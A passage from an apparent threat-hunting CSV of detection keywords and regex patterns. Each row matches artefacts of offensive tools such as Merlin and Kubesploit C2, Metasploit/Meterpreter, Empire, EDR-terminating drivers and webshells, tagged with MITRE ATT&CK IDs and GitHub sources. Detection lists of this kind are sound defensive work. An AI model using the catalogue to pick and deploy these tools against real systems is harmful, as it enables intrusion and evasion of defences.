TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinHTTP.HTTP*",".{0,1000}merlinHTTP\.HTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.JA3*",".{0,1000}merlinHTTP\.JA3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.PARROT*",".{0,1000}merlinHTTP\.PARROT.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.WINHTTP*",".{0,1000}merlinHTTP\.WINHTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" 
"*merlinHTTP.WININET*",".{0,1000}merlinHTTP\.WININET.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinServer-*.7z*",".{0,1000}merlinServer\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-*.exe*",".{0,1000}merlinServer\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - 
TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*merlinServer-Linux*",".{0,1000}merlinServer\-Linux.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Linux-x64.7z*",".{0,1000}merlinServer\-Linux\-x64\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - 
T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*mertdas/RedPersist*",".{0,1000}mertdas\/RedPersist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*mertdas/SharpLDAP*",".{0,1000}mertdas\/SharpLDAP.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*mertdas/SharpTerminator*",".{0,1000}mertdas\/SharpTerminator.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*MessageBox.Show*Pwned*",".{0,1000}MessageBox\.Show.{0,1000}Pwned.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - 
T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*messagebox_reflective.dll*",".{0,1000}messagebox_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*MessageBoxW(*""Stardust Socket Failed""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sFailed\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageBoxW(*""Stardust Socket Initialization""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sInitialization\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageBoxW(*""We are all made of Stardust!""*",".{0,1000}MessageBoxW\(.{0,1000}\""We\sare\sall\smade\sof\sStardust!\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageDeobfuscation.exe*",".{0,1000}MessageDeobfuscation\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*met_inject.py*",".{0,1000}met_inject\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*metagoofil*",".{0,1000}metagoofil.{0,1000}","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... 
etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*metame -i *.exe*",".{0,1000}metame\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*Metasploit*",".{0,1000}Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit.go*",".{0,1000}metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*metasploit.rb*",".{0,1000}metasploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit/framework*",".{0,1000}metasploit\/framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit/peass.rb*",".{0,1000}metasploit\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*metasploit_framework.rb*",".{0,1000}metasploit_framework\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*metasploitframework*.msi*",".{0,1000}metasploitframework.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MetasploitPayload.ps1*",".{0,1000}MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*metatwin.ps1*",".{0,1000}metatwin\.ps1.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*metatwin-master*",".{0,1000}metatwin\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*meterpeter.ps1*",".{0,1000}meterpeter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Meterpeter_$RandMe.zip*",".{0,1000}Meterpeter_\$RandMe\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - 
TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*meterpreter*.rb*",".{0,1000}meterpreter.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*meterpreter.*",".{0,1000}meterpreter\..{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*Meterpreter.ps1*",".{0,1000}Meterpreter\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*meterpreter.sl*",".{0,1000}meterpreter\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*meterpreter_*.rb",".{0,1000}meterpreter_.{0,1000}\.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
